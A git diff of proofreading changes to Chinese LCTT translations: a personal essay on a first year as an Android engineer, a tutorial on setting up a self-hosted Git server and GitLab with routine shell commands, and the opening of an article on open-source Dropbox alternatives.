这一转变归功于我在晚上和周末投入学习 Android 的时间。我通过了[ Android 基础纳米学位][3]、[Andriod 工程师纳米学位][4]课程,也获得了[ Google 开发者认证][5]。这部分的详细故事在[这儿][6]。
|
这一转变归功于我在晚上和周末投入学习 Android 的时间。我通过了 [Android 基础纳米学位][3]、[Andriod 工程师纳米学位][4]课程,也获得了 [Google 开发者认证][5]。这部分的详细故事在[这儿][6]。
|
||||||
|
|
||||||
两个月后,公司雇佣了另一位 QA,我转向全职工作。挑战从此开始!
|
两个月后,公司雇佣了另一位 QA,我转向全职工作。挑战从此开始!
|
||||||
|
|
||||||
@ -46,29 +47,27 @@ Android 工程师的一年
|
|||||||
|
|
||||||
一个例子就是拉取代码进行公开展示和代码审查。有是我会请同事私下检查我的代码,并不想被公开拉取,向任何人展示。
|
一个例子就是拉取代码进行公开展示和代码审查。有是我会请同事私下检查我的代码,并不想被公开拉取,向任何人展示。
|
||||||
|
|
||||||
其他时候,当我做代码审查时,会花好几分钟盯着"批准"按纽犹豫不决,在担心审查通过的会被其他同事找出毛病。
|
其他时候,当我做代码审查时,会花好几分钟盯着“批准”按纽犹豫不决,在担心审查通过的代码会被其他同事找出毛病。
|
||||||
|
|
||||||
当我在一些事上持反对意见时,由于缺乏相关知识,担心被坐冷板凳,从来没有大声说出来过。
|
当我在一些事上持反对意见时,由于缺乏相关知识,担心被坐冷板凳,从来没有大声说出来过。
|
||||||
|
|
||||||
> 某些时间我会请同事私下[...]检查我的代码,以避免被公开展示。
|
> 某些时间我会请同事私下[...]检查我的代码,以避免被公开展示。
|
||||||
|
|
||||||
* * *
|
|
||||||
|
|
||||||
### 新的公司,新的挑战
|
### 新的公司,新的挑战
|
||||||
|
|
||||||
后来,我手边有了个新的机会。感谢曾经和我共事的朋友,我被[ Babbel ][7]邀请去参加初级 Android 工程师职位的招聘流程。
|
后来,我手边有了个新的机会。感谢曾经和我共事的朋友,我被 [Babbel][7] 邀请去参加初级 Android 工程师职位的招聘流程。
|
||||||
|
|
||||||
我见到了他们的团队,同时自告奋勇的在他们办公室主持了一次本地会议。此事让我下定决心要申请这个职位。我喜欢公司的箴言:全民学习。其次,公司每个人都非常友善,在那儿工作看起来很愉快!但我没有马上申请,因为我认为自己不够好,所以为什么能申请呢?
|
我见到了他们的团队,同时自告奋勇的在他们办公室主持了一次本地会议。此事让我下定决心要申请这个职位。我喜欢公司的箴言:全民学习。其次,公司每个人都非常友善,在那儿工作看起来很愉快!但我没有马上申请,因为我认为自己不够好,所以为什么能申请呢?
|
||||||
|
|
||||||
还好我的朋友和搭档推动我这样做,他们给了我发送简历的力量和勇气。过后不久就进入了面试流程。这很简单:以很小的应该程序来进行编码挑战,随后是和团队一起的技术面试,之后是和招聘经理间关于团队合作的面试。
|
还好我的朋友和搭档推动我这样做,他们给了我发送简历的力量和勇气。过后不久就进入了面试流程。这很简单:以很小的程序的形式来进行编码挑战,随后是和团队一起的技术面试,之后是和招聘经理间关于团队合作的面试。
|
||||||
|
|
||||||
#### 招聘过程
|
#### 招聘过程
|
||||||
|
|
||||||
我用周未的时间来完成编码挑战的项目,并在周一就立即发送过去。不久就受邀去当场面试。
|
我用周未的时间来完成编码挑战的项目,并在周一就立即发送过去。不久就受邀去当场面试。
|
||||||
|
|
||||||
技术面试是关于编程挑战本身,我们谈论了 Android 好的不好的、我为什么以这种方式实现这功能,以及如何改进等等。随后是招聘经理进行的一次简短的关于团队合作面试,也有涉及到编程挑战的事,我们谈到了我面临的挑战,我如何解决这些问题,等等。
|
技术面试是关于编程挑战本身,我们谈论了 Android 好的不好的地方、我为什么以这种方式实现这功能,以及如何改进等等。随后是招聘经理进行的一次简短的关于团队合作面试,也有涉及到编程挑战的事,我们谈到了我面临的挑战,我如何解决这些问题,等等。
|
||||||
|
|
||||||
最后,通过面试,得到 offer, 我授受了!
|
最后,通过面试,得到 offer,我授受了!
|
||||||
|
|
||||||
我的 Android 工程师生涯的第一年,有九个月在一个公司,后面三个月在当前的公司。
|
我的 Android 工程师生涯的第一年,有九个月在一个公司,后面三个月在当前的公司。
|
||||||
|
|
||||||
@ -88,7 +87,7 @@ Android 工程师的一年
|
|||||||
|
|
||||||
两次三次后,压力就堵到胸口。为什么我还不知道?为什么就那么难理解?这种状态让我焦虑万分。
|
两次三次后,压力就堵到胸口。为什么我还不知道?为什么就那么难理解?这种状态让我焦虑万分。
|
||||||
|
|
||||||
我意识到我需要承认我确实不懂某个特定的主题,但第一步是要知道有这么个概念!有是,仅仅需要的就是更多的时间、更多的练习,最终会"在大脑中完全演绎" :-)
|
我意识到我需要承认我确实不懂某个特定的主题,但第一步是要知道有这么个概念!有时,仅仅需要的就是更多的时间、更多的练习,最终会“在大脑中完全演绎” :-)
|
||||||
|
|
||||||
例如,我常常为 Java 的接口类和抽象类所困扰,不管看了多少的例子,还是不能完全明白他们之间的区别。但一旦我使用后,即使还不能解释其工作原理,也知道了怎么使用以及什么时候使用。
|
例如,我常常为 Java 的接口类和抽象类所困扰,不管看了多少的例子,还是不能完全明白他们之间的区别。但一旦我使用后,即使还不能解释其工作原理,也知道了怎么使用以及什么时候使用。
|
||||||
|
|
||||||
@ -102,19 +101,13 @@ Android 工程师的一年
|
|||||||
|
|
||||||
工程师的角色不仅仅是编码,而是广泛的技能。 我仍然处于旅程的起点,在掌握它的道路上,我想着重于以下几点:
|
工程师的角色不仅仅是编码,而是广泛的技能。 我仍然处于旅程的起点,在掌握它的道路上,我想着重于以下几点:
|
||||||
|
|
||||||
* 交流:因为英文不是我的母语,所以有的时候我会努力传达我的想法,这在我工作中是至关重要的。我可以通过写作,阅读和交谈来解决这个问题。
|
* 交流:因为英文不是我的母语,所以有的时候我需要努力传达我的想法,这在我工作中是至关重要的。我可以通过写作,阅读和交谈来解决这个问题。
|
||||||
|
* 提有建设性的反馈意见:我想给同事有意义的反馈,这样我们一起共同发展。
|
||||||
* 提有建设性的反馈意见: 我想给同事有意义的反馈,这样我们一起共同发展。
|
* 为我的成就感到骄傲:我需要创建一个列表来跟踪各种成就,无论大小,或整体进步,所以当我挣扎时我可以回顾并感觉良好。
|
||||||
|
* 不要着迷于不知道的事情:当有很多新事物出现时很难做到都知道,所以只关注必须的,及手头项目需要的东西,这非常重要的。
|
||||||
* 为我的成就感到骄傲: 我需要创建一个列表来跟踪各种成就,无论大小,或整体进步,所以当我挣扎时我可以回顾并感觉良好。
|
* 多和同事分享知识:我是初级的并不意味着没有可以分享的!我需要持续分享我感兴趣的的文章及讨论话题。我知道同事们会感激我的。
|
||||||
|
* 耐心和持续学习:和现在一样的保持不断学习,但对自己要有更多耐心。
|
||||||
* 不要着迷于不知道的事情: 当有很多新事物出现时很难做到都知道,所以只关注必须的,及手头项目需要的东西,这非常重要的。
|
* 自我保健:随时注意休息,不要为难自己。 放松也富有成效。
|
||||||
|
|
||||||
* 多和同事分享知识。我是初级的并不意味着没有可以分享的!我需要持续分享我感兴趣的的文章及讨论话题。我知道同事们会感激我的。
|
|
||||||
|
|
||||||
* 耐心和持续学习: 和现在一样的保持不断学习,但对自己要有更多耐心。
|
|
||||||
|
|
||||||
* 自我保健: 随时注意休息,不要为难自己。 放松也富有成效。
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
@ -122,7 +115,7 @@ via: https://proandroiddev.com/a-year-as-android-engineer-55e2a428dfc8
|
|||||||
|
|
||||||
作者:[Lara Martín][a]
|
作者:[Lara Martín][a]
|
||||||
译者:[runningwater](https://github.com/runningwater)
|
译者:[runningwater](https://github.com/runningwater)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
@ -1,91 +1,92 @@
|
|||||||
搭建属于你自己的 Git 服务器
|
搭建属于你自己的 Git 服务器
|
||||||
======
|
======
|
||||||
**在本文中,我们的目的是让你了解如何设置属于自己的Git服务器。**
|
|
||||||
|
|
||||||
Git 是由 Linux Torvalds 开发的一个版本控制系统,现如今正在被全世界大量开发者使用。许多公司喜欢使用基于 Git 版本控制的 GitHub 代码托管。[根据报道,GitHub 是现如今全世界最大的代码托管网站][3]。GitHub 宣称已经有 920 万用户和 2180 万个仓库。许多大型公司现如今也将代码迁移到 GitHub 上。[甚至于谷歌,一家搜索引擎公司,也正将代码迁移到 GitHub 上][4]。
|
![](https://www.linux.com/images/stories/41373/GitLab-3.png)
|
||||||
|
|
||||||
|
> 在本文中,我们的目的是让你了解如何设置属于自己的Git服务器。
|
||||||
|
|
||||||
|
[Git][1] 是由 [Linux Torvalds 开发][2]的一个版本控制系统,现如今正在被全世界大量开发者使用。许多公司喜欢使用基于 Git 版本控制的 GitHub 代码托管。[根据报道,GitHub 是现如今全世界最大的代码托管网站][3]。GitHub 宣称已经有 920 万用户和 2180 万个仓库。许多大型公司现如今也将代码迁移到 GitHub 上。[甚至于谷歌,一家搜索引擎公司,也正将代码迁移到 GitHub 上][4]。
|
||||||
|
|
||||||
### 运行你自己的 Git 服务器
|
### 运行你自己的 Git 服务器
|
||||||
|
|
||||||
GitHub 能提供极佳的服务,但却有一些限制,尤其是你是单人或是一名 coding 爱好者。GitHub 其中之一的限制就是其中免费的服务没有提供代码私有化托管业务。[你不得不支付每月7美金购买5个私有仓库][5],并且想要更多的私有仓库则要交更多的钱。
|
GitHub 能提供极佳的服务,但却有一些限制,尤其是你是单人或是一名 coding 爱好者。GitHub 其中之一的限制就是其中免费的服务没有提供代码私有托管业务。[你不得不支付每月 7 美金购买 5 个私有仓库][5],并且想要更多的私有仓库则要交更多的钱。
|
||||||
|
|
||||||
|
|
||||||
万一你想要仓库私有化或需要更多权限控制,最好的方法就是在你的服务器上运行 Git。不仅你能够省去一笔钱,你还能够在你的服务器有更多的操作。在大多数情况下,大多数高级 Linux 用户已经拥有自己的服务器,并且在这些服务器上推送 Git 就像“啤酒一样免费”(LCTT 译者注:指免费软件)。
|
|
||||||
|
|
||||||
|
万一你想要私有仓库或需要更多权限控制,最好的方法就是在你的服务器上运行 Git。不仅你能够省去一笔钱,你还能够在你的服务器有更多的操作。在大多数情况下,大多数高级 Linux 用户已经拥有自己的服务器,并且在这些服务器上方式 Git 就像“啤酒一样免费”(LCTT 译注:指免费软件)。
|
||||||
|
|
||||||
在这篇教程中,我们主要讲在你的服务器上,使用两种代码管理的方法。一种是运行一个纯 Git 服务器,另一个是使用名为 [GitLab][6] 的 GUI 工具。在本教程中,我在 VPS 上运行的操作系统是 Ubuntu 14.04 LTS。
|
在这篇教程中,我们主要讲在你的服务器上,使用两种代码管理的方法。一种是运行一个纯 Git 服务器,另一个是使用名为 [GitLab][6] 的 GUI 工具。在本教程中,我在 VPS 上运行的操作系统是 Ubuntu 14.04 LTS。
|
||||||
|
|
||||||
### 在你的服务器上安装Git
|
### 在你的服务器上安装 Git
|
||||||
|
|
||||||
在本篇教程中,我们考虑一个简单案例,我们有一个远程服务器和一台本地服务器,现在我们需要使用这两台机器来工作。为了简单起见,我们就分别叫他们为远程服务器和本地服务器。
|
在本篇教程中,我们考虑一个简单案例,我们有一个远程服务器和一台本地服务器,现在我们需要使用这两台机器来工作。为了简单起见,我们就分别叫它们为远程服务器和本地服务器。
|
||||||
|
|
||||||
首先,在两边的机器上安装Git。你可以从依赖包中安装 Git,在本文中,我们将使用更简单的方法:
|
首先,在两边的机器上安装 Git。你可以从依赖包中安装 Git,在本文中,我们将使用更简单的方法:
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo apt-get install git-core
|
sudo apt-get install git-core
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
为 Git 创建一个用户。
|
为 Git 创建一个用户。
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo useradd git
|
sudo useradd git
|
||||||
passwd git
|
passwd git
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
为了容易的访问服务器,我们设置一个免密 ssh 登录。首先在你本地电脑上创建一个 ssh 密钥:
|
为了容易的访问服务器,我们设置一个免密 ssh 登录。首先在你本地电脑上创建一个 ssh 密钥:
|
||||||
|
|
||||||
```
|
```
|
||||||
ssh-keygen -t rsa
|
ssh-keygen -t rsa
|
||||||
|
|
||||||
```
|
```
|
||||||
这时会要求你输入保存密钥的路径,这时只需要点击回车便保存在默认路径。第二个问题是输入访问远程服务器所需的密码。它生成两个密钥——公钥和私钥。记下您在下一步中需要使用的公钥的位置。
|
|
||||||
|
这时会要求你输入保存密钥的路径,这时只需要点击回车保存在默认路径。第二个问题是输入访问远程服务器所需的密码。它生成两个密钥——公钥和私钥。记下您在下一步中需要使用的公钥的位置。
|
||||||
|
|
||||||
现在您必须将这些密钥复制到服务器上,以便两台机器可以相互通信。在本地机器上运行以下命令:
|
现在您必须将这些密钥复制到服务器上,以便两台机器可以相互通信。在本地机器上运行以下命令:
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
cat ~/.ssh/id_rsa.pub | ssh git@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
|
cat ~/.ssh/id_rsa.pub | ssh git@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
|
||||||
|
|
||||||
```
|
```
|
||||||
现在,用 ssh 登录进服务器并为 Git 创建一个项目路径。你可以为你的仓库设置一个你想要的目录。
|
|
||||||
|
现在,用 `ssh` 登录进服务器并为 Git 创建一个项目路径。你可以为你的仓库设置一个你想要的目录。
|
||||||
|
|
||||||
现在跳转到该目录中:
|
现在跳转到该目录中:
|
||||||
|
|
||||||
```
|
```
|
||||||
cd /home/swapnil/project-1.git
|
cd /home/swapnil/project-1.git
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在新建一个空仓库:
|
现在新建一个空仓库:
|
||||||
|
|
||||||
```
|
```
|
||||||
git init --bare
|
git init --bare
|
||||||
Initialized empty Git repository in /home/swapnil/project-1.git
|
Initialized empty Git repository in /home/swapnil/project-1.git
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在我们需要在本地机器上新建一个基于 Git 版本控制仓库:
|
现在我们需要在本地机器上新建一个基于 Git 版本控制仓库:
|
||||||
|
|
||||||
```
|
```
|
||||||
mkdir -p /home/swapnil/git/project
|
mkdir -p /home/swapnil/git/project
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
进入我们创建仓库的目录:
|
进入我们创建仓库的目录:
|
||||||
|
|
||||||
```
|
```
|
||||||
cd /home/swapnil/git/project
|
cd /home/swapnil/git/project
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在在该目录中创建项目所需的文件。留在这个目录并启动 git:
|
现在在该目录中创建项目所需的文件。留在这个目录并启动 `git`:
|
||||||
|
|
||||||
```
|
```
|
||||||
git init
|
git init
|
||||||
Initialized empty Git repository in /home/swapnil/git/project
|
Initialized empty Git repository in /home/swapnil/git/project
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
把所有文件添加到仓库中:
|
把所有文件添加到仓库中:
|
||||||
|
|
||||||
```
|
```
|
||||||
git add .
|
git add .
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在,每次添加文件或进行更改时,都必须运行上面的 add 命令。 您还需要为每个文件更改都写入提交消息。提交消息基本上说明了我们所做的更改。
|
现在,每次添加文件或进行更改时,都必须运行上面的 `add` 命令。 您还需要为每个文件更改都写入提交消息。提交消息基本上说明了我们所做的更改。
|
||||||
|
|
||||||
```
|
```
|
||||||
git commit -m "message" -a
|
git commit -m "message" -a
|
||||||
@ -93,10 +94,9 @@ git commit -m "message" -a
|
|||||||
2 files changed, 2 insertions(+)
|
2 files changed, 2 insertions(+)
|
||||||
create mode 100644 GoT.txt
|
create mode 100644 GoT.txt
|
||||||
create mode 100644 writing.txt
|
create mode 100644 writing.txt
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
在这种情况下,我有一个名为 GoT(权力游戏审查)的文件,并且我做了一些更改,所以当我运行命令时,它指定对文件进行更改。 在上面的命令中 `-a` 选项意味着提交仓库中的所有文件。 如果您只更改了一个,则可以指定该文件的名称而不是使用 `-a`。
|
在这种情况下,我有一个名为 GoT(《权力的游戏》的点评)的文件,并且我做了一些更改,所以当我运行命令时,它指定对文件进行更改。 在上面的命令中 `-a` 选项意味着提交仓库中的所有文件。 如果您只更改了一个,则可以指定该文件的名称而不是使用 `-a`。
|
||||||
|
|
||||||
举一个例子:
|
举一个例子:
|
||||||
|
|
||||||
@ -104,124 +104,124 @@ git commit -m "message" -a
|
|||||||
git commit -m "message" GoT.txt
|
git commit -m "message" GoT.txt
|
||||||
[master e517b10] message
|
[master e517b10] message
|
||||||
1 file changed, 1 insertion(+)
|
1 file changed, 1 insertion(+)
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
到现在为止,我们一直在本地服务器上工作。现在我们必须将这些更改推送到远程服务器上,以便通过 Internet 访问,并且可以与其他团队成员进行协作。
|
到现在为止,我们一直在本地服务器上工作。现在我们必须将这些更改推送到远程服务器上,以便通过互联网访问,并且可以与其他团队成员进行协作。
|
||||||
|
|
||||||
```
|
```
|
||||||
git remote add origin ssh://git@remote-server/repo-<wbr< a="">>path-on-server..git
|
git remote add origin ssh://git@remote-server/repo-<wbr< a="">>path-on-server..git
|
||||||
|
|
||||||
```
|
```
|
||||||
现在,您可以使用 “pull” 或 “push” 选项在服务器和本地计算机之间 push 或 pull:
|
|
||||||
|
现在,您可以使用 `pull` 或 `push` 选项在服务器和本地计算机之间推送或拉取:
|
||||||
|
|
||||||
```
|
```
|
||||||
git push origin master
|
git push origin master
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
如果有其他团队成员想要使用该项目,则需要将远程服务器上的仓库克隆到其本地计算机上:
|
如果有其他团队成员想要使用该项目,则需要将远程服务器上的仓库克隆到其本地计算机上:
|
||||||
|
|
||||||
```
|
```
|
||||||
git clone git@remote-server:/home/swapnil/project.git
|
git clone git@remote-server:/home/swapnil/project.git
|
||||||
|
|
||||||
```
|
```
|
||||||
这里 /home/swapnil/project.git 是远程服务器上的项目路径,在你本机上则会改变。
|
|
||||||
|
这里 `/home/swapnil/project.git` 是远程服务器上的项目路径,在你本机上则会改变。
|
||||||
|
|
||||||
然后进入本地计算机上的目录(使用服务器上的项目名称):
|
然后进入本地计算机上的目录(使用服务器上的项目名称):
|
||||||
|
|
||||||
```
|
```
|
||||||
cd /project
|
cd /project
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在他们可以编辑文件,写入提交更改信息,然后将它们推送到服务器:
|
现在他们可以编辑文件,写入提交更改信息,然后将它们推送到服务器:
|
||||||
|
|
||||||
```
|
```
|
||||||
git commit -m 'corrections in GoT.txt story' -a
|
git commit -m 'corrections in GoT.txt story' -a
|
||||||
And then push changes:
|
```
|
||||||
|
|
||||||
git push origin master
|
然后推送改变:
|
||||||
|
|
||||||
```
|
```
|
||||||
|
git push origin master
|
||||||
|
```
|
||||||
|
|
||||||
我认为这足以让一个新用户开始在他们自己的服务器上使用 Git。 如果您正在寻找一些 GUI 工具来管理本地计算机上的更改,则可以使用 GUI 工具,例如 QGit 或 GitK for Linux。
|
我认为这足以让一个新用户开始在他们自己的服务器上使用 Git。 如果您正在寻找一些 GUI 工具来管理本地计算机上的更改,则可以使用 GUI 工具,例如 QGit 或 GitK for Linux。
|
||||||
|
|
||||||
|
![](https://www.linux.com/images/stories/41373/QGit.jpg)
|
||||||
|
|
||||||
### 使用 GitLab
|
### 使用 GitLab
|
||||||
|
|
||||||
这是项目所有者和合作者的纯粹命令行解决方案。这当然不像使用 GitHub 那么简单。不幸的是,尽管 GitHub 是全球最大的代码托管商,但是它自己的软件别人却无法使用。因为它不是开源的,所以你不能获取源代码并编译你自己的 GitHub。与 WordPress 或 Drupal 不同,您无法下载 GitHub 并在您自己的服务器上运行它。
|
这是项目所有者和协作者的纯命令行解决方案。这当然不像使用 GitHub 那么简单。不幸的是,尽管 GitHub 是全球最大的代码托管商,但是它自己的软件别人却无法使用。因为它不是开源的,所以你不能获取源代码并编译你自己的 GitHub。这与 WordPress 或 Drupal 不同,您无法下载 GitHub 并在您自己的服务器上运行它。
|
||||||
|
|
||||||
|
|
||||||
像往常一样,在开源世界中,是没有终结的尽头。GitLab 是一个非常优秀的项目。这是一个开源项目,允许用户在自己的服务器上运行类似于 GitHub 的项目管理系统。
|
像往常一样,在开源世界中,是没有终结的尽头。GitLab 是一个非常优秀的项目。这是一个开源项目,允许用户在自己的服务器上运行类似于 GitHub 的项目管理系统。
|
||||||
|
|
||||||
|
|
||||||
您可以使用 GitLab 为团队成员或公司运行类似于 GitHub 的服务。您可以使用 GitLab 在公开发布之前开发私有项目。
|
您可以使用 GitLab 为团队成员或公司运行类似于 GitHub 的服务。您可以使用 GitLab 在公开发布之前开发私有项目。
|
||||||
|
|
||||||
|
|
||||||
GitLab 采用传统的开源商业模式。他们有两种产品:免费的开源软件,用户可以在自己的服务器上安装,以及类似于 GitHub 的托管服务。
|
GitLab 采用传统的开源商业模式。他们有两种产品:免费的开源软件,用户可以在自己的服务器上安装,以及类似于 GitHub 的托管服务。
|
||||||
|
|
||||||
|
|
||||||
可下载版本有两个版本,免费的社区版和付费企业版。企业版基于社区版,但附带针对企业客户的其他功能。它或多或少与 WordPress.org 或 Wordpress.com 提供的服务类似。
|
可下载版本有两个版本,免费的社区版和付费企业版。企业版基于社区版,但附带针对企业客户的其他功能。它或多或少与 WordPress.org 或 Wordpress.com 提供的服务类似。
|
||||||
|
|
||||||
|
|
||||||
社区版具有高度可扩展性,可以在单个服务器或群集上支持 25000 个用户。GitLab 的一些功能包括:Git 仓库管理,代码评论,问题跟踪,活动源和维基。它配备了 GitLab CI,用于持续集成和交付。
|
社区版具有高度可扩展性,可以在单个服务器或群集上支持 25000 个用户。GitLab 的一些功能包括:Git 仓库管理,代码评论,问题跟踪,活动源和维基。它配备了 GitLab CI,用于持续集成和交付。
|
||||||
|
|
||||||
|
Digital Ocean 等许多 VPS 提供商会为用户提供 GitLab 服务。 如果你想在你自己的服务器上运行它,你可以手动安装它。GitLab 为不同的操作系统提供了软件包。 在我们安装 GitLab 之前,您可能需要配置 SMTP 电子邮件服务器,以便 GitLab 可以在需要时随时推送电子邮件。官方推荐使用 Postfix。所以,先在你的服务器上安装 Postfix:
|
||||||
Digital Ocean 等许多 VPS 提供商会为用户提供 GitLab 服务。 如果你想在你自己的服务器上运行它,你可以手动安装它。GitLab 为不同的操作系统提供 Omnibus 软件包。 在我们安装 GitLab 之前,您可能需要配置 SMTP 电子邮件服务器,以便 GitLab 可以在需要时随时推送电子邮件。官方推荐使用 Postfix。所以,先在你的服务器上安装 Postfix:
|
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo apt-get install postfix
|
sudo apt-get install postfix
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
在安装 Postfix 期间,它会问你一些问题,不要跳过它们。 如果你一不小心跳过,你可以使用这个命令来重新配置它:
|
在安装 Postfix 期间,它会问你一些问题,不要跳过它们。 如果你一不小心跳过,你可以使用这个命令来重新配置它:
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo dpkg-reconfigure postfix
|
sudo dpkg-reconfigure postfix
|
||||||
|
|
||||||
```
|
```
|
||||||
运行此命令时,请选择 “Internet 站点”并为使用 Gitlab 的域名提供电子邮件ID。
|
|
||||||
|
|
||||||
|
运行此命令时,请选择 “Internet Site”并为使用 Gitlab 的域名提供电子邮件 ID。
|
||||||
|
|
||||||
我是这样输入的:
|
我是这样输入的:
|
||||||
|
|
||||||
```
|
```
|
||||||
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
|
xxx@x.com
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
用 Tab 键并为 postfix 创建一个用户名。接下来将会要求你输入一个目标邮箱。
|
用 Tab 键并为 postfix 创建一个用户名。接下来将会要求你输入一个目标邮箱。
|
||||||
|
|
||||||
在剩下的步骤中,都选择默认选项。当我们安装且配置完成后,我们继续安装 GitLab。
|
在剩下的步骤中,都选择默认选项。当我们安装且配置完成后,我们继续安装 GitLab。
|
||||||
|
|
||||||
我们使用 wget 来下载软件包(用 [最新包][7] 替换下载链接):
|
我们使用 `wget` 来下载软件包(用 [最新包][7] 替换下载链接):
|
||||||
|
|
||||||
```
|
```
|
||||||
wget https://downloads-packages.s3.amazonaws.com/ubuntu-14.04/gitlab_7.9.4-omnibus.1-1_amd64.deb
|
wget https://downloads-packages.s3.amazonaws.com/ubuntu-14.04/gitlab_7.9.4-omnibus.1-1_amd64.deb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
然后安装这个包:
|
然后安装这个包:
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo dpkg -i gitlab_7.9.4-omnibus.1-1_amd64.deb
|
sudo dpkg -i gitlab_7.9.4-omnibus.1-1_amd64.deb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
现在是时候配置并启动 GitLab 了。
|
现在是时候配置并启动 GitLab 了。
|
||||||
|
|
||||||
```
|
```
|
||||||
sudo gitlab-ctl reconfigure
|
sudo gitlab-ctl reconfigure
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
您现在需要在配置文件中配置域名,以便您可以访问 GitLab。打开文件。
|
您现在需要在配置文件中配置域名,以便您可以访问 GitLab。打开文件。
|
||||||
|
|
||||||
```
|
```
|
||||||
nano /etc/gitlab/gitlab.rb
|
nano /etc/gitlab/gitlab.rb
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
在这个文件中编辑 'external_url' 并输入服务器域名。保存文件,然后从 Web 浏览器中打开新建的一个 GitLab 站点。
|
在这个文件中编辑 `external_url` 并输入服务器域名。保存文件,然后从 Web 浏览器中打开新建的一个 GitLab 站点。
|
||||||
|
|
||||||
|
![](https://www.linux.com/images/stories/41373/GitLab-1.jpg)
|
||||||
|
|
||||||
默认情况下,它会以系统管理员的身份创建 'root',并使用 '5iveL!fe' 作为密码。 登录到 GitLab 站点,然后更改密码。
|
默认情况下,它会以系统管理员的身份创建 `root`,并使用 `5iveL!fe` 作为密码。 登录到 GitLab 站点,然后更改密码。
|
||||||
|
|
||||||
|
![](https://www.linux.com/images/stories/41373/GitLab-2.png)
|
||||||
|
|
||||||
密码更改后,登录该网站并开始管理您的项目。
|
密码更改后,登录该网站并开始管理您的项目。
|
||||||
|
|
||||||
|
![](https://www.linux.com/images/stories/41373/GitLab-3.png)
|
||||||
|
|
||||||
GitLab 有很多选项和功能。最后,我借用电影“黑客帝国”中的经典台词:“不幸的是,没有人知道 GitLab 可以做什么。你必须亲自尝试一下。”
|
GitLab 有很多选项和功能。最后,我借用电影“黑客帝国”中的经典台词:“不幸的是,没有人知道 GitLab 可以做什么。你必须亲自尝试一下。”
|
||||||
|
|
||||||
|
|
||||||
@ -232,7 +232,7 @@ via: https://www.linux.com/learn/how-run-your-own-git-server
|
|||||||
作者:[Swapnil Bhartiya][a]
|
作者:[Swapnil Bhartiya][a]
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
译者:[wyxplus](https://github.com/wyxplus)
|
译者:[wyxplus](https://github.com/wyxplus)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
122
published/20180618 5 open source alternatives to Dropbox.md
Normal file
122
published/20180618 5 open source alternatives to Dropbox.md
Normal file
@ -0,0 +1,122 @@
|
|||||||
|
可代替 Dropbox 的 5 个开源软件
|
||||||
|
=====
|
||||||
|
|
||||||
|
> 寻找一个不会破坏你的安全、自由或银行资产的文件共享应用。
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/dropbox.jpg?itok=qFwcqboT)
|
||||||
|
|
||||||
|
Dropbox 在文件共享应用中是个 800 磅的大猩猩。尽管它是个极度流行的工具,但你可能仍想使用一个软件去替代它。
|
||||||
|
|
||||||
|
也行你出于各种好的理由,包括安全和自由,这使你决定用[开源方式][1]。亦或是你已经被数据泄露吓坏了,或者定价计划不能满足你实际需要的存储量。
|
||||||
|
|
||||||
|
幸运的是,有各种各样的开源文件共享应用,可以提供给你更多的存储容量,更好的安全性,并且以低于 Dropbox 很多的价格来让你掌控你自己的数据。有多低呢?如果你有一定的技术和一台 Linux 服务器可供使用,那尝试一下免费的应用吧。
|
||||||
|
|
||||||
|
这里有 5 个最好的可以代替 Dropbox 的开源应用,以及其他一些,你可能想考虑使用。
|
||||||
|
|
||||||
|
### ownCloud
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/owncloud.png)
|
||||||
|
|
||||||
|
[ownCloud][2] 发布于 2010 年,是本文所列应用中最老的,但是不要被这件事蒙蔽:它仍然十分流行(根据该公司统计,有超过 150 万用户),并且由由 1100 个参与者的社区积极维护,定期发布更新。
|
||||||
|
|
||||||
|
它的主要特点——文件共享和文档写作功能和 Dropbox 的功能相似。它们的主要区别(除了它的[开源协议][3])是你的文件可以托管在你的私人 Linux 服务器或云上,给予用户对自己数据完全的控制权。(自托管是本文所列应用的一个普遍的功能。)
|
||||||
|
